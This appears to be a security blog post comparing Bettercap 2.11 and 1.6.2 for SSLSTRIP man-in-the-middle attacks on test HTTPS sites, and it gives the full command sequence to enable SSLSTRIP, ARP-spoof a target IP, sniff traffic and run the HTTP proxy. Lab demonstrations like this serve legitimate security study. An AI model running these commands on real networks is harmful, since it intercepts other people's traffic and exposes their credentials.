SSLSTRIP attacks - New Bettercap 2.x vs Old Bettercap 1.x

During my previous two SSLSTRIP videos, I preferred to use the "old" Bettercap version 1.6.2, instead of the "new" Bettercap version 2.x.
Bettercap version 1.6.2 is the version which is currently available into the Kali Linux repository.
Bettercap version 2.x can be installed from the following GitHub link: https://github.com/bettercap/bettercap

In this video I will use the latest Bettercap version 2.11 to perform SSLSTRIP MITM attacks against sample HTTPS websites. These are the same websites that we tested with during the previous SSLSTRIP videos:
Bettercap with SSLSTRIP attack - Does it still work ?
SSLSTRIP attacks with Bettercap and MITMF - more info about HSTS and Web browsers

Bettercap 2.x is an awesome tool, but unfortunately it seems to have a few shortcomings when it comes to SSLSTRIP. These SSLSTRIP-related issues were previously raised into the following post:
https://github.com/bettercap/bettercap/issues/154
During this video we will experience the same type of issues as the ones described in the post.

Bettercap 2.11

Bettercap version 2.11.0 - Duprass was used during this video.
bettercap_linux_amd64_2.11.zip was downloaded and installed from https://github.com/bettercap/bettercap/releases

Bettercap 2.11 commands

The following Bettercap 2.x commands were used to configure the test SSLSTRIP MITM attack:

set http.proxy.sslstrip true                         (enables SSLSTRIP)
set arp.spoof.internal true                         (enables internal network ARP spoofing)
set arp.spoof.targets 192.168.254.70      (sets the ARP spoofing target)
set net.sniff.verbose false                          (disables verbose sniffing info)
net.sniff on            (starts the sniffer module)
http.proxy on         (starts the http proxy module)
arp.spoof on          (starts the ARP spoofing module)

SSLSTRIP attacks - New Bettercap 2.x vs Old Bettercap 1.x



Comments

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Generating shellcode - using msfvenom to generate a binary payload

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux